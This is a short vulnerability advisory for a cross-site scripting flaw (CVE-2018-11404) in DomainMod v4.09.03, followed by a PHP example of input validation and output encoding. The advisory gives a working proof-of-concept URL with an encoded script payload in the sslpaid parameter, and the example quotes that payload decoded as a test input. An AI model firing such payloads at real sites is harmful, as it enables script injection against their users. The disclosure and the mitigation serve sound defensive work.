Vendor: DomainMod
By: longer
CVSS: 6.1 (MEDIUM)
Cross-Site Scripting (XSS)
CWE: 79
Product Name: DomainMod
Affected Version From: v4.09.03
Affected Version To: v4.09.03
Patch Exists: YES
Related CWE: CVE-2018-11404
CPE: a:domainmod:domainmod
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018
DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
An issue was discovered in DomainMod v4.09.03. After the user has logged in, opening the following URL causes the XSS payload to be executed: http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
Mitigation:
Input validation and output encoding should be used to prevent XSS attacks.
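
The mitigation above, sketched in PHP as an added example (not DomainMod's code or its actual patch). It assumes sslpaid is a positive integer record ID, which the page does not state, and parse_record_id and html_out are hypothetical helper names.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not DomainMod's own code.

/**
 * Validate an ID-style query parameter. Assumes sslpaid is a positive
 * integer record ID (an assumption; the page does not state its type).
 * Returns the integer, or null when the value is not a clean integer.
 */
function parse_record_id(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: the URL-decoded sslpaid value from the
// report above, and an ordinary numeric ID.
$samples = [
    '\'"()&%<acx><ScRiPt >prompt(931289)</ScRiPt>',
    '42',
];

foreach ($samples as $raw) {
    $id = parse_record_id($raw);
    if ($id === null) {
        // Reject early; anything echoed back (for example in an error
        // message) is still encoded, so markup arrives as inert text.
        echo 'rejected: ', html_out($raw), PHP_EOL;
        continue;
    }
    // $id is an int here, and the value is still encoded at the point of output.
    echo '<a href="ssl-provider-account.php?sslpaid=', html_out((string) $id),
        '">account ', $id, '</a>', PHP_EOL;
}
```

Validation and encoding are applied together: validation rejects the malformed value before it reaches application logic, and encoding at output covers any path where the raw value is still displayed.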